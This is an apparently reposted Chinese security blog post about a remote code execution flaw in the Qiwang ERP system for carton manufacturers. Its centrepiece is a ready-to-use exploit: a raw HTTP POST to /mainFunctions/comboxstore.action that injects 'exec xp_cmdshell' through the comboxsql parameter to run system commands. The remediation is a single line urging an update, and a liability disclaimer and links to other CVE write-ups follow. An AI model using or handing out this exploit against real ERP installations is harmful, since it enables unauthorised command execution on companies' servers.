某ERP系统RCE漏洞（附EXP）

2024年5月19日04:07:35评论22 views字数 635阅读2分7秒阅读模式

0x01 前言

企望制造纸箱行业ERP系统涉及纸箱企业管理的各个方面，包括成本核算，报价定价，订单下达，生产排单，现场管理，成品入库，出货配送，全业务流程财务结算，质量管理贯穿始终，将纸箱企业管理水平提升到一个全新的高度，实现精确计算，合理规划，高效监管、分工合作、充分沟通的管理理念。该网站存在RCE漏洞

0x02 影响平台

企望ERP系统

0x03 漏洞复现

页面是这个酱紫

某ERP系统RCE漏洞（附EXP）

EXP：

POST /mainFunctions/comboxstore.action HTTP/1.1Host: ip:portUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36Accept-Encoding: gzip, deflateAccept: */*Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 39

comboxsql=exec%20xp_cmdshell%20'whoami'

Success~

某ERP系统RCE漏洞（附EXP）

0x04 参考来源

https://mp.weixin.qq.com/s/v6qkGlN7AuecoD-aVDE9eQ

0x05 修复方案

建议及时更新至最新版本！

原文始发于微信公众号（EchoSec）：某ERP系统RCE漏洞（附EXP）

免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉。

左青龙
微信扫一扫

右白虎
微信扫一扫

某ERP系统RCE漏洞（附EXP）

漏洞复现 || XWiki Platform系统远程代码执行 POC

用友NC files 反序列化RCE

【高危漏洞预警】Elastic Kibana需授权代码注入漏洞 (CVE-2025-25014)

CVE-2025-2905（CVSS 9.1）：WSO2 API 管理器中发现严重 XXE 漏洞

【风险通告】Elastic Kibana存在原型污染致任意代码执行漏洞（CVE-2025-25014）

Kibana 原型污染导致执行任意代码漏洞（CVE-2025-25014）

CVE-2025-24071：通过 RAR/ZIP 提取和 .library-ms 文件泄露 NTLM 哈希值

Kibana 原型污染导致执行任意代码漏洞（CVE-2025-25014）

WordPress depicter插件SQL注入漏洞（CVE-2025-2011）

Kibana 原型污染导致任意代码执行漏洞 (CVE-2025-25014)

发表评论

在线咨询

微信